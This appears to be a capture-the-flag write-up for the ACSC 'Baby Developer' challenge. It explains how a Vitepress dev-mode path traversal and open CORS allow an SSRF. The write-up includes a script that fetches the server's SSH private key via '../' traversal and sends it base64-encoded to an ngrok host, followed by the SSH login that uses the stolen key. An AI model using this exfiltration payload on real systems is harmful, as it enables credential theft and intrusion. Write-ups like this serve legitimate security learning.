Baby Developer
Directory traversal in insecure Vitepress development server leads to information disclosure through SSRF

Description

I made a mobile (apple watch miniminimini series 1337) viewer on my personal server.
  • http://baby-developer.chal.acsc.asia:8888/
  • ssh baby-developer.chal.acsc.asia -p2222

Solution

  • There is a genflag server which you are supposed to SSRF
  • However, the remote address and user agent are checked so you can't do it directly from mobile-viewer
  • The pages are rendered as screenshots
1
@app.route('/flag')
2
def hello_world():
3
if request.remote_addr == dev and 'iPhone' not in request.headers.get('User-Agent'):
4
fp = open('/flag', 'r')
5
flag = fp.read()
6
return flag
7
else:
8
return "Nope.."
Copied!
From mobile-viewer, we need to request http://genflag/flag from website. This can be done from /home/stypr/readflag on website.
1
# Challenge: get flag!
2
RUN touch /home/stypr/.hushlogin && \
3
echo '#include <stdio.h>\r\n#include <stdlib.h>\r\nint main(){FILE *fp;char flag[1035];fp = popen("/usr/bin/curl -s http://genflag/flag", "r");if (fp == NULL) {printf("Error found. Please contact administrator.");exit(1);}while (fgets(flag, sizeof(flag), fp) != NULL) {printf("%s", flag);}pclose(fp);return 0;}' > /home/stypr/readflag.c && \
4
gcc -o /home/stypr/readflag /home/stypr/readflag.c && \
5
chmod +x /home/stypr/readflag && rm -rf /home/stypr/readflag.c
Copied!
Refer to the website source. The website server runs yarn dev, which runs vitepress dev src.
Vitepress is run on dev mode. I found that this enables CORS, allowing us to perform a CSRF to exfiltrate data. Furthermore, I found that there was a path traversal vulnerability, allowing us to get the SSH key: http://website/../../../../../home/stypr/.ssh/id_rsa
From mobile-viewer, we can make a request to our attacker site, which contains:
1
<script>
2
fetch("http://website/../../../../../home/stypr/.ssh/id_rsa")
3
.then(resp => resp.text())
4
.then(data => fetch('http://0db7-115-66-195-39.ngrok.io/?' + btoa(data)))
5
</script>
Copied!
Get the private key and SSH into the server to get the flag:
1
$ ssh [email protected] -p2222 -i id_rsa
2
ACSC{weird_bugs_pwned_my_system_too_late_to_get_my_CVE}
Copied!
Last modified 1mo ago
Copy link